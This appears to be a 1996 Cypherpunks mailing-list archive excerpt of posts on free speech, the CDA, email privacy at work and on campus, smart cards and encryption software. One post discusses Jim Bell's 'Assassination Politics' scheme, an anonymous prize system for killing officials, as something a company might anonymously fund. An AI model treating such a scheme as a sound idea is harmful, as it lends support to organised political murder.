      "want to have dossiers on people with incredible detail
      so they can pick and choose what they send to you."

   "Invention Machine's Software Wins Orders for Picking
   Brains of Inventors."

      A software program is being snapped up by a growing
      number of America's biggest companies to provide
      inventing partners for their engineers. The program
      codifies the invention principles behind some two
      million international patents and the inventive
      techniques of some of the world's greatest inventors.
      Mr. Tsourikov said the product grew out of his early
      studies under Genrich Altshuller, who posited that
      invention isn't a random process but has a certain
      algorithm which drives it.


   COO_kie










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 13 Feb 1996 04:59:44 +0800
To: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Subject: Re: LI Newsday OpEd: Criminal Justice System
In-Reply-To: <199602120047.TAA02205@UNiX.asb.com>
Message-ID: <199602121616.LAA18717@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"Deranged Mutant" writes:
> Found a really good op-ed piece in LI Newsday, Thurs. Feb 8, pA53
> by Robert Reno, "If Jails Are Full, How Much Tougher Can Judges Get?"

I personally find stuff like this interesting, but I prefer read about
it in places like libernet or the like. Cypherpunks is for
cryptography.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vincent Cate <vince@offshore.com.ai>
Date: Tue, 13 Feb 1996 01:59:03 +0800
To: "Declan B. McCullagh" <declan+@CMU.EDU>
Subject: Lower Prices - Was Re: [NOISY] Re: New Internet Privacy Provider - Press Release
In-Reply-To: <8l7hYdG00YUvF3yaIP@andrew.cmu.edu>
Message-ID: <Pine.LNX.3.91.960212112010.5143A-100000@online.offshore.com.ai>
MIME-Version: 1.0
Content-Type: text/plain



I have decided to offer a $50/month Unix/Web/POP account that is
good for 50 MB/month of traffic.  After that it is $1/MB of
traffic.  To open the account an initial account balance of $300 is
required (from which monthly and traffic charges will be deducted). 

See http://online.offshore.com.ai/  for more info and to open
an account.

   --  Vince





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Wed, 14 Feb 1996 17:03:33 +0800
To: WlkngOwl@UNiX.asb.com
Subject: Re: Spin Control Alert (LI Newsday, 2/12/96)
In-Reply-To: <199602121313.IAA26828@UNiX.asb.com>
Message-ID: <Ko5Hx8m9LsAe085yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199602121313.IAA26828@UNiX.asb.com>,
"Deranged Mutant" <WlkngOwl@UNiX.asb.com> wrote:

> Know your enemies:
> 
> There's an op-ed in LI Newsday by Cathleen A. Cleaver ("directory of 
> legal studies at the Family Research Council..." in LI Newsday today.
> 
> Serious pro-CDA spin here. Justifies the bust of Amateur Action BBS, 
> ignoring that they were set up by the gov't, and then insists the CDA 
> only prohibits making porn accessible to kids. Calls anti-CDA folx 
> "free-speech zealots" and "friends of the porn industry", claims the 
> courts can determine merit on a per-case basis, and claims objections 
> to CDA are really from "arrogance and greed... Most Americans do not 
> have access to the Internet. The on-line elite would like to keep it 
> that way..."

No surprises here.  Except for the "on-line elite" shot in the dark, the
anti-sex censors have been talking this way for decades.

What's interesting is that your report of this spokesperson's tone makes
it sound *defensive* -- like a reaction to an onslaught rather than a
celebration of victory.

The battle for people's hearts and minds on this issue is far from over.

ObMetzgerQ:  What the hell does this have to do with cryptography?

ObMetzgerA:  Nothing! So there!  Hahahahahahha!

- -- 
   Alan Bostick             | "If I am to be held in contempt of court,
Seeking opportunity to      | your honor, it can only be because the court
develop multimedia content. | has acted contemptibly!"
Finger abostick@netcom.com for more info and PGP public key

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMR+b5uVevBgtmhnpAQH62wL8CgSlQ7r6WsRkLZmWeQMPjuzuEoCxsdq6
Q2ZLE/6pOSd01ieK+5SzQhUZQQtIB2mCu6rhtAVK1zjJPUJ/eLuGWvLmdPnJAGZw
cSPoVqoYW1XSas4ATzcnK9dC71ao9VOS
=je58
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Tue, 13 Feb 1996 10:25:31 +0800
To: "Deranged Mutant" <WlkngOwl@UNiX.asb.com>
Subject: Re: V-chips, CC, and Motorcycle Helmets
Message-ID: <2.2.32.19960212203533.0090a244@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:20 AM 2/12/96 +0000, Deranged Mutant wrote:
>> Parents had that ability before.  Cable boxes have a "perental control key"
>> on the side that enables them to lock out "offensive" channels.  It works
>> quite well and is fairly hard for the kidlets to defeat.  (I used it to
>> lockout the religious stations and home shopping channels.)
>
>When I was a kid some friends down the street knew how to unlock the 
>Channel 100 XXX movies with a paper clip.  A V-chip would hopefully 
>be more sophisticated, but then again, so are today's kids...

Sshhh!  You are not supposed to tell them that!

>> The "V-Chip" debate is a mirror of the one that occured when the cable
>> channels were starting to become popular.  There was a big hue and cry about
>> kids getting to the "naughty" channels without parent concent.  Seems most
>> people do not even learn how the lockouts work.  (And are too lazy to learn.)
>
>You should check out your nearest H/P BBS or ftp-site...

Yeah, I know it can be hacked.  I also know that if they are that interested
in sex, NOTHING I do is going to stop them.  (Which is as it should be.  If
they have no exposure to any sexual material as a youth, some rather nasty
problems tend to crop up as adults. (Take a look at the studies of sexual
predators.) But that is a point avoided by the moralists...)

>> You have to remember that most of the people arguing for TV filters are
>> looking for a way to make the "offensive" stuff go away for good.  (Either
>[..]
>
>A very good point.  One that makes me wary of V-Chips...

It makes me very wary of them.  What gets me are all the people here who
talk about them as if they will have useful features.  They will be about as
useful as the ratings on video games.  ("Hey, theres a cool one!  This one
has flying mangled bodies!  Its OK though.  No sex!")

---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
"I, Caligula Clinton... In the name of the Senate and the people of Rome!"
   - Bill Clinton signing the CDA with the First Amendment bent over.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 13 Feb 1996 06:57:46 +0800
To: cypherpunks@toad.com
Subject: Edupage Extract - Employees & Email
Message-ID: <01I14KD89LN4A0UZOC@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	Somehow, I can understand how sending it to a _supervisor_ would break
privacy protections...
	Crypto relevance? Anonymous remailers can be used for complaints &
whistle-blowing. The latter may be unfortunate, depending on the law being
enforced.
	-Allen

From:	IN%"educom@elanor.oit.unc.edu" 11-FEB-1996 21:53:17.72
Subj:	Edupage, 11 February 1996

*****************************************************************
Edupage, 11 February 1996.  Edupage, a summary of news items on information
technology, is provided three times each week as a service by Educom,
a Washington, D.C.-based consortium of leading colleges and universities
seeking to transform education through the use of information technology.
*****************************************************************

JUDGE RULES AGAINST EMPLOYEE IN E-MAIL SNOOPING CASE
A federal judge in Philadelphia has ruled against a former employee of the
Pillsbury Co. who filed a suit claiming invasion of privacy after his e-mail
messages threatening to "kill the backstabbing bastards" and referring to an
upcoming party as the "Jim Jones Koolaid affair" were deemed to be
inappropriate, unprofessional and offensive, leading to his firing in
October 1994.  The company had repeatedly assured its employees that all
e-mail communications would be kept confidential, but the court found that,
"Once plaintiff communicated the alleged unprofessional comments to a second
person (his supervisor) over an e-mail system which was apparently utilized
by the entire company, any reasonable expectation of privacy was lost." (BNA
Daily Labor Report 6 Feb 96 AA1)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Tue, 13 Feb 1996 07:20:55 +0800
To: cypherpunks@toad.com
Subject: Flying Sorcerers
Message-ID: <960212125445.2021ab25@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain



>Not just this, but another data point about the current sentiment about
>Washington: In a movie theater today there was a preview of the upcoming
>movie "Independence Day," showing a flying saucer hovering over the White
>House, then destroying it. The audience cheered and clapped.

"To serve man" no doubt.
						P.fla




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sophi@best.com (Greg Kucharo)
Date: Tue, 13 Feb 1996 10:30:33 +0800
To: cypherpunks@toad.com
Subject: Firewall USA to Firewall China
Message-ID: <v01530500ad454e6a21aa@[206.86.81.52]>
MIME-Version: 1.0
Content-Type: text/plain


 At the meeting on saturday the idea of a Firewall USA was discussed.
Here's a quote from Jim Clark CEO of Netscape on the idea of a Firewall
China, just for comparison.

Q: The Chinese government has declared its intention to filter out
  what it considers to be objectionable material from the Internet. If
  you were a consultant for the Chinese government, what technology
  would you recommend that they use to do that?

  A: A lot of people think that's not possible. It's difficult to enforce,
  but it's certainly possible. A corporation has a so-called fire wall -- a
  single point of entry into the corporate net. You can have a country
  that has a single point of entry into its "country net." It's doable. All
  you need, though, is one breach of security, and there's a leak.

  A fire wall is a filter -- it filters and doesn't let certain people come in.
  You can only come in if you have the right permission. So you could
  easily set that up so that it would filter out your objectionable
  material.

this is a temp .sig






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Baugh <bruce@aracnet.com>
Date: Tue, 13 Feb 1996 10:31:35 +0800
To: cypherpunks@toad.com
Subject: Re: The Emotional Killer (or out of the frying pan and into the electric chair?)
Message-ID: <2.2.32.19960212211715.00695b2c@mail.aracnet.com>
MIME-Version: 1.0
Content-Type: text/plain


This is off-topic; anyone wanting to follow up on it, e-mail me on the side.

At 11:59 PM 2/11/96 -0500, tallpaul@pipeline.com (tallpaul) wrote:

>This and other posts by J. Bell and other lib'bers 

Jim Bell is pretty much exactly as relevant to libertarian thought as Lyndon
LaRouche is to Democratic thought - that is, he's a crank, whom we prefer to
ignore where possible. I, for one, filter his messages straight to Eudora's
Trash mailbox.

If you want to sample a different variety of libertarianism, check out the
URL in my sig file and look at the Christlib list. Or, for that matter,
simply leaf through REASON and LIBERTY magazine, and note the variety of
folks actually _doing_ things that promote "human freedom for everyone" as
well as talking about it.

It's not as much fun as ad hominem, I admit, but in the long run I think
it's more useful.

Bruce Baugh
bruce@aracnet.com
http://www.aracnet.com/~bruce





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 12 Feb 1996 21:15:55 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199602121240.NAA22530@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


merriman@arn.net ("David K. Merriman") asks:

>At 10:27 AM 02/11/96 GMT, postmaster@warehouse.mn.org (Postmaster) wrote:
>>The user this message was addressed to does not exist at this
site.  Please
>>verify the name and domain in the original message that
follows.
>>Message was addressed to: SAMUEL.KAPLIN@warehouse.mn.org
>>

>Anybody besides me getting these things?

Thanks to SMTP not anymore I'd hope.

Noise will be noise.

Cheerio...






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Tue, 13 Feb 1996 14:04:11 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <960212134104.2021ab25@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain



>Yet if I read you correctly earlier, you don't think the USG has the right 
>to regulate those communications. Why the distinction ?

Okay, obviously I need to drop down a gear & explain *my* feelings:

Part of the definition of a "sovereign nation" is to define and carry
out both high and low justice over it's domain - the absolute right
of a sovereign. Is not mentioned in the US constitution because it 
was a given. Further, the purpose of the US Constitution is to:
a) define what the sovereign was (three branches - rock, scissors, & paper)
b) set forth certain limitations on that sovereign ("Congress shall make
   no law...")
c) define certain duties of the sovereign (regulation of foreign commerce...)

(am simplifying so please bear with me)

There are some things which for which the rationale is not apparent since
the times have changed ("corruption of blood" is a "Congress shall not"
that related back to English law of the time). What "Attainder" was
is not mentioned since it was well understood.

No this gets us back to the question: to me, "regulation of foreign commerce"
has two elements - one is to prevent illegal commerce or traffic in goods 
that are contrary to "the public good". The other is to promote American
trade and intrests overseas. The two go together and is the point I made
at the NIST gathering in December. Quid pro quo.

"Free speech" means that a citizen is free to speak (communicate) anthing,
anytime, anywhere. This is the right guarenteed by the first amendment. This
does not relieve the individual from being liable for the consequences of 
the exercise of "free speech".

However, the government is under no obligation (though in the silly seventies
it seemed that we were going that way) to aid or abet in the exercise of
free speech. If it were properly and legally decided that communications 
with anon.penet.fi is against "national interest" then the sovereign has 
not only the "right" but the *duty* to block/monitor such communications.

Now as to the second part of the question, I have never said that the 
conditions mentioned above could not legally exist (though I have my
doubts about legality internally and between citizens - is part of the
reasons American Corporations have never had a problem getting a license
for use with foreign offices). What I said was that any such regulation
would be impossible to enforce for two reasons:

1) While current crypto advertises its presence, crypto exists which
   is indestinguishable from random noise and would be impossible to
   prove was used. Further it would be necessary to specify what was
   not crypto (and the law frowns on negatives). Navaho, Basque, PKZIP,
   and EBCDIC are examples that fall readily to mind.

2) The second objection is more obscure but should be considered in places
   that lack our constitutional protections: given a message, any message,
   I can demonstrate a OTP or algorithm that will turn that into any
   message desired. Therefore just the existance of a message and a
   decrypt would be insufficient to prove the "chain" that one led from/to
   the other.

Thus in the one case, I referring to the obligations/limitations that our 
constitution places on the US government (is what it is really about). In
the other I was referring to what it is *possible* for the government to 
do without considering legality (if they can't, does not matter if legal). 
Does this clear up the confusion ?

						Warmly,
							Padgett

ps just to add some more wood "any law that can not be demonstrated to be
   universally enforceable with the resources allocated should be repealed".




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 13 Feb 1996 17:04:08 +0800
To: cypherpunks@toad.com
Subject: Re: Assasination Politics
Message-ID: <01I14MTH8YDGA0UZOC@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"jimbell@pacifier.com"  "jim bell" 12-FEB-1996 04:18:43.34

>>How much weight is Lotus going to give the opinions of a bunch of
>>unbalanced sociopaths when they're thinking about making deal to gak those
>>extra 24 bits?  Not much, I'll bet. 

>If "AsPol" actually WORKS, Lotus won't have to "deal" to get "those extra 24 
>bits."

>Lotus should announce that they have heard of this new idea on CP, called 
>"Assassination Politics," and have assigned a couple dozen programmers to 
>implement it by July 1996.  They'd back (guarantee) the prizes for the first 
>such organization, and they'd sell the software to others.  At that point, I 
>think the resignations from government office would skyrocket.  

	It seems likely that any overt organization operating an Assasination
Politics scheme will be outlawed... even though the most logical reading of
current laws says that it isn't illegal (except for the gambling part). An
anonymously constructed one seems a lot more likely - which Lotus could then
anonymously patronize. I do have some ideas for making such possible, but I'm
waiting on a defense of three points before I'll release them. These points
are:

	A. My previously mentioned problem with a limited but non-libertarian
organization.
	B. I don't trust the average person to look ahead enough to make this
(or other Anarcho-Capitalist) schemes work. In other words, the average person
has to be able to see that a non-limited organization is a danger to them,
etcetera. Moreover, Jim Bell is ignoring the other sources of propaganda than
government in convincing the average person that someone is doing something
wrong (when, by my ethics at least, they aren't) - such as religion and
various organizations like the PFDA. Admittedly, as I've stated before, the
requirement for some money would help, at least to the degree that our economy
is meritocratic. (A growing tendency, fortunately.) If most people are on a
subsistence wage (the result of free trade & automation with varying human
abilities), they can't afford enough money for Assasination Politics. (Yes,
I'm an intellectual Elitist. Deal with it.)
	C. While I may not like dealing with the average person very much (see
above), I don't want to see them starving in the streets. I can see
governmental welfare as being necessary for this, although the private form
is definitely preferable. (And yes, I can justify this as being a libertarian -
if not Libertarian Party - viewpoint. If I recall correctly, I had a debate
with Perry on this on Libernet, in which he tried to dismiss me as "just a
Democrat." I was posting under the name ALLENS@YANG.EARLHAM.EDU at the time).
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Tue, 13 Feb 1996 09:59:46 +0800
To: cypherpunks@toad.com
Subject: Censorship and Snooping at Winthrop University
Message-ID: <kl7tHCu00YUtEGVm0a@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Following are portions of a message I sent to Winthrop University
administrators. They're considering a heinous new policy that says:

"No information should be exchanged through E-mail that is not official 
University business.  No personal or confidential information should be 
exchanged and all communications are subject to periodic and/or random
audit by the Office of Information Technology to ensure compliance with
this policy."

-Declan

---------- Forwarded message begins here ----------

From: Declan McCullagh
To: feldern@winthrop.edu, broachg@winthrop.edu, rosenj@winthrop.edu,
        moressiw@winthrop.edu, jonesr@winthrop.edu, cormierp@winthrop.edu
cc: wellsj@winthrop.edu, harrisoc@lurch.winthrop.edu, browne@winthrop.edu,
        duboisp@winthrop.edu, margare946@aol.com,
        fight-censorship+@andrew.cmu.edu
Subject: Censorship at Winthrop University

February 12, 1996

Dear Winthrop University Administrators:

I was disturbed to read a recent Associated Press article reporting that
Winthrop University has censored the web pages of two of your students and
suspended the students from classes after one of them placed nude
photographs online. I was even more dimayed to read that your school's
proposed computing policy allows university officials to snoop through
your students' electronic mailboxes at will.

For shame! The American Library Association's draft policy recommendation
on electronic services and networks says, on student computer accounts:

    No user should be restricted or denied access for expressing or
    receiving constitutionally protected speech. No user's access
    should be changed without due process, including, but not limited
    to, notice and a means of appeal.

The American Association of University Professors endorsed this statement
on academic freedom, published in the July-August 1992 _Academe_, which
says in part:
 
    On a campus that is free and open, no idea can be banned or
    forbidden... Free speech is not simply an aspect of the educational
    enterprise to be weighed against other desirable ends. It is the very
    precondition of the academic enterprise itself.

Regarding your plans to look at student email, more information is
available at ftp://ftp.eff.org/pub/CAF/faq/email.privacy, which says:

    According to Mike Godwin, legal services counsel for the Electronic
    Frontier Foundation (EFF), the U.S.'s Electronic Communications
    Privacy Act (ECPA) could be reasonably construed to protect university
    email. This is also the reported opinion of the U. of Michigan's
    lawyers. Also, the U.S.'s Family Educational Rights and Privacy Act
    gives students at all public and most private schools some privacy
    rights. 

According to the AAUP statement and according to the fundamental
principles of academic freedom, universities must protect controversial
speech on their campuses. If Winthrop University does not, it is violating
its historic commitments to free speech and turning its pledges to uphold
academic freedom and freedom of expression into broken promises. 

I've copied this message to the fight-censorship mailing list, which has
among its subscribers roughly 50 journalists interested in online
censorship issues, including writers from TIME, Newsweek, The New York
Times, The Washington Post, Internet World, WIRED, and many others. I
invite you to clarify your university's position and respond directly to
the mailing list. Cyberspace is developing quickly, and I feel confident
that Winthrop University would not want to be known as an online leader in
repression, censorship, and Orwellian thought-policing. 

I trust that a school such as Winthrop University, with such a
distinguished College of Education, will not neglect the fundamental
principles upon which your university was founded. I hope that you
understand that voiceless speech and inkless press must receive the same
protections as voiced speech and inked press. I urge you to reconsider 
your policies. I look forward to your reply. 

Very truly yours,

Declan McCullagh


PS: I'm attaching a file from Carl Kadie's Computers and Academic Freedom
archive, at http://www.eff.org/CAF/. More information is also available 
at the Justice on Campus project, at http://joc.mit.edu/.


---------------------------------------------------------------------



February 11, 1996

  	  				 
	ROCK HILL, S.C. (AP) -- Winthrop students Brian Walker and Josh  
Campbell have had their university Internet accounts pulled after 
officials said they violated school policy. 
	Walker created a web page soliciting money and Campbell created  
one including a nude woman. While the two admitted they crossed the 
line, the Feb. 2 suspension has risen free speech debates and 
computer policy review through the school. 
	Both students deleted their web pages, and their two-week  
suspension was reduced to one. 
	Nathaniel Felder, Winthrop's associate vice president for  
information technology, said work on amending the computer policy 
has been ongoing. School officials planned to submit the proposals 
Friday to Winthrop's board of trustees. 
	But Internet users, particularly professors and students,  
thought the new policy included language that infringed on their 
rights and violated their freedom of speech. So, the policy will be 
forwarded to a computer committee for further review. 
	Professors and students opposed language in the policy that said  
e-mail be used only for official university business. The policy 
also allows officials to randomly audit e-mail for compliance. 
	``It could be a violation of the principles of the free change  
of ideas at the university,'' political science professor Glen 
Broach said. 
	But Bob Thompson, Winthrop's board chairman, said Internet  
policy is to protect the users and Winthrop from liability. 



=============== ftp://ftp.eff.org/pub/CAF/faq/computer-porn ===============
q: Should universities create a rule banning "porn" on university
computers?

a: In my opinion, no. Such a rule would be unnecessary and too broad.

[Disclaimers: I'm not a lawyer. This answer is based on the situation
in the U.S.]

A computer porn ban is too broad because "pornography" is not a
well-defined term. For many people, "pornography" means any nude or
sexually suggestive material. While you may intend only to stop
computer-science students from looking at _Playboy_ centerfolds in your
computer labs, your rule may also stop liberal-arts students from
viewing the growing number of fine art collections on the Net.

For example, 2,800 images are on-line at the Australian National University
    ANU.
Among these images is a print of Manet's "Olympia"
    Olympia.
When this now famous nude was unveiled in 1863, it caused an outrage
because of its blatant sexuality. Hundreds of images are also
available at the WebMuseum
    The WebMuseum.
Among these images is Salvador Dali's shocking "Young Virgin
Autosodomised by her own Chastity"
    <a
href="http://www.emf.net/wm/paint/auth/dali/works/dali.virgin.jpg">Virgin
</a>.

Either of these images could be used to sexually harass someone, but
so could many noncomputer images on your campus such as art on the
University's walls and the _Playboy_ centerfolds that are likely in
your university library.

A rule banning computer porn is unnecessary because university
computer facilities can (and should) be treated as ny other university
facility. That means banning the act of harassment, not the materials
that can be used to harass but that can also be used without harassing
anyone. Similar reasoning was used by a federal district judge in June
1994. In the widely reported case, he said that "quiet reading" of a
_Playboy_ magazine by a firefighter does not create a sexually
harassing atmosphere.

At least in the U.S., virtually every university has a sexual
harassment policy that not only covers harassment via computers but
that also dictates the exact procedure for handling sexual harassment
complaints. (Having a procedure is important because the line between
constitutionally protected expression and unprotected expression is
dim and uncertain.) Computer sites should publicize the university's
sexual harassment rules; they should not try to preempt them. See the
referenced U. of Illinois report on the Status of Women for concrete
suggestions on publicizing your existing sexual harassment rules.

So what about material that may be illegal in your jurisdiction, for
example libel, threats, obscenity-in-the-legal-sense, copyright
violations, etc.? Many university computer policies include the "Law
Law", that is, the rule that says that it is forbidden to violate the
law. This is not quite as redundant as it may seem because it
authorizes the University to handle infractions itself via its
established due process procedure.

- Carl Kadie

ANNOTATED REFERENCES

(All these documents are available on-line. Access information follows.)

=================<a
href="http://www.eff.org/CAF/faq/censorship-and-harassment.html">
faq/censorship-and-harassment
=================</a>
* Censorship And Harassment
 
q: Must/should universities ban material that some find offensive
(from Netnews facilities, email, libraries, and student publications,
etc) in order to comply with antiharassment laws?
 
a: No. U.S. federal courts have said that harassing speech is
...

=================<a href="ftp://ftp.eff.org/pub/CAF/law/quiet-reading">
law/quiet-reading
=================</a>
* Expression -- Harassment -- Quiet Reading of _Playboy_

Excerpts from a newspaper report that a federal district judge has
said that "quiet reading" of a _Playboy_ magazine by a firefighter
does not create a sexually harassing atmosphere. [Editorial comment: I
think this supports the idea that rather banning "porn" from a general
academic computer, it is more appropriate to ban harassment.]

=================<a
href="ftp://ftp.eff.org/pub/CAF/academic/women-in-eng.uiuc.txt">
academic/women-in-eng.uiuc.txt
=================</a>
ASCII (plain text version) of "Final Report of the Committee on the
Status of Women Graduate Students and Faculty in the College of
Engineering" at the University of Illinois at Urbana-Champaign. (Also
available in TeX and Postscript form.)

=================<a
href="ftp://ftp.eff.org/pub/CAF/academic/artistic.freedom.aaup">
academic/artistic.freedom.aaup
=================</a>
* Artistic Freedom (AAUP)

Academic Freedom and Artistic Expression - An official statement of
the American Association of University Professors (AAUP)

It says in part: "In our judgment academic freedom in the creation and
presentation of works in the visual and performing arts, by ensuring
greater opportunity for imaginative exploration and expression, best
serves the public and the academy."

=================<a
href="ftp://ftp.eff.org/pub/CAF/library/challenged-materials.ala">
library/challenged-materials.ala
=================</a>
* Challenged Materials (ALA)

An interpretation by the American Library Association of the "Library
Bill of Rights". It says in part "The Constitution requires a
procedure designed to focus searchingly on challenged expression
before it can be suppressed.  An adversary hearing is a part of this
procedure."

=================<a href="ftp://ftp.eff.org/pub/CAF/law/miller">
law/miller
=================</a>
* Expression -- Obscenity -- Law -- Miller

The Supreme Court's definition of obscenity (the so-called _Miller_
test)

=================
=================

If you have gopher, you can browse the CAF archive with the command
   gopher gopher.eff.org

These document(s) are also available by anonymous ftp (the preferred
method) and by email. To get the file(s) via ftp, do an anonymous ftp
to ftp.eff.org, and then:

  cd  /pub/CAF/faq
  get censorship-and-harassment
  cd  /pub/CAF/law
  get quiet-reading
  cd  /pub/CAF/academic
  get women-in-eng.uiuc.txt
  cd  /pub/CAF/academic
  get artistic.freedom.aaup
  cd  /pub/CAF/library
  get challenged-materials.ala
  cd  /pub/CAF/law
  get miller

To get the file(s) by email, send email to ftpmail@decwrl.dec.com
Include the line(s):

  connect ftp.eff.org
  cd  /pub/CAF/faq
  get censorship-and-harassment
  cd  /pub/CAF/law
  get quiet-reading
  cd  /pub/CAF/academic
  get women-in-eng.uiuc.txt
  cd  /pub/CAF/academic
  get artistic.freedom.aaup
  cd  /pub/CAF/library
  get challenged-materials.ala
  cd  /pub/CAF/law
  get miller







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: strata@virtual.net
Date: Wed, 14 Feb 1996 17:15:31 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re:A Cyberspace Independence Refutation
Message-ID: <CMM.0.90.2.824165545.strata@virtual-city.virtual.net>
MIME-Version: 1.0
Content-Type: text/plain



Duncan,

A well-thought out set of replies, but entirely within your line of thinking.
I apologize for not replying to your point by point, but I still have to keep
my typing to a minimum due to RSI.  I traded a work day for my Refutation
(in typing time).

I believe that you and I are working with either a subset or an almost
disjoint set of facts in relation to each other on the subjects of the
origins of the net, Operation Sun Devil, subsequent seizures, the operation
of the IETF and InterNIC, and how physical routing policy can be used to
easily implement gag orders.  Rather than have us attempt to educate each
other via back-and-forth messages, I will go back and re-examine some source
material on each of these issues over the next few weeks.  If my opinions
change, I will post them to you and to this list.  In the meantime, let us
merely agree to disagree; your mind is clearly made up, as is mine.

Cheers,
_Strata




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 13 Feb 1996 14:50:33 +0800
To: cypherpunks@toad.com
Subject: Smartcard report from Nando.Net
Message-ID: <01I14P8XSUYOA0UZOC@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	Anyone know anything else about this? Like any privacy protections (I
doubt it), counterfeiting protections, etcetera?
	Thanks,
	-Allen


      Copyright &copy 1996 Nando.net
      Copyright &copy 1996 Bloomberg
      
   
   
   LONDON (Feb 12, 1996 11:23 a.m. EST) -- Motorola Inc. said it won two
   contracts to supply microchips for smart cards that will be used by
   the governments of Spain and the Czech Republic to administer benefit
   programs.
   
   The cards are credit-card sized devices incorporating
   specially-designed memory chips, called microcontrollers. They have a
   growing number of applications and can be used instead of cash in
   stores, at telephone booths, for pay-television and computer-shopping.
   
   The largest demand, though, will come from government agencies, like
   Spain's Social Security Administration and the Czech Republic's
   Healthcare Ministry. China, with a population of 1.2 billion, is
   considering a national identification card using this technology, said
   Waqar Qureshi, Motorola worldwide marketing manager for smart-card
   chips.
   

[...]

   Spain has ordered 7 million microprocessors, valued at more than $10
   million, from Motorola in the first phase of a nationwide program that
   could grow to 40 million cards. The chips will store the digitized
   description of the holders' fingerprints, which should help to reduce
   fraud.
   
   "The smart cards will enable multiple transactions with the Social
   Security to be carried out in a more secure manner and their use can
   easily be extended to other services," said a spokesman for the
   Spanish Social Security Ministry, quoted in a Motorola statement.
   
   In the Czech Republic, Motorola is supplying 10,000 chips for a pilot
   health-insurance program in the Litomerice region. A countrywide
   health-card project for 10 million people is planned for introduction
   starting in 1997.
   
[...]

   "These two contracts, valued at tens of millions of dollars, are prime
   examples of the growing trend among governments across the world to
   look at smartcard solutions in the administration of public social
   services and benefits," said Allan Hughes, Motorola's worldwide
   smartcard manager.
   
   Visa Spain said in December it would launch smart cards to replace the
   use of cash for transactions as small as buying a pack of cigarettes.
   
   With software written in Spanish that already is being used in Miami,
   Colombia and Argentina, Visa Spain said it intends to place as many as
   3 million "Visa Cash" cards a year in circulation in Spain this year.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: willer@carolian.com (Steve Willer)
Date: Tue, 13 Feb 1996 00:18:12 +0800
To: cypherpunks@toad.com
Subject: Free end-to-end encryption code?
Message-ID: <311f5807.109332@saturn>
MIME-Version: 1.0
Content-Type: text/plain


As a side project, to support remote mail and news pickup through the
Internet to my company's servers (through a firewall), I've been
slowly writing an end-to-end encryption program. Essentially, the idea
is that the client program (say, a mail program) connects to a client
"reflector", which lives on the same person's machine. The client
reflector connects to a server reflector, which perhaps lives on the
firewall. The client and server talk to each other, the client is
authenticated, and the session key is agreed upon. Then the server
reflector connects to the server process (say, smtpd, probably on some
machine inside the company's net), and an encypted session is
obtained. This doesn't protect against the machine's memory being
watched or anything like that, but it does provide a good amount of
security for packets over the Internet, just like the end-to-end type
of encryption software described in Applied Cryptography.

Now, this is my first code with any real encryption in it, and I'm
trying to tackle key negotiation protocols and so on, while at the
same time utilizing RSA, IDEA and MD5. In my research, I found that a
number of firewall vendors have such a system available, either
implemented in hardware or software. What I want to know is: Is there
any code like this available somewhere on the net that does this
stuff? I would hate to have to reinvent the wheel if I don't have to,
given my limited amount of spare time.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: printing@explicit.com (William Knowles)
Date: Tue, 13 Feb 1996 15:11:22 +0800
To: cypherpunks@toad.com
Subject: 24 hours of Democracy
Message-ID: <m0tm5hn-0006dYC@tako.wwa.com>
MIME-Version: 1.0
Content-Type: text/plain


Found this in my mail this morning.

-William Knowles
  printing@explicit.com

--(Fwd)--

---------------------------------------
Amusing Rants from Dave Winer's Desktop
Released on 2/12/96; 5:59:40 AM PST
---------------------------------------

  ***Good Morning!

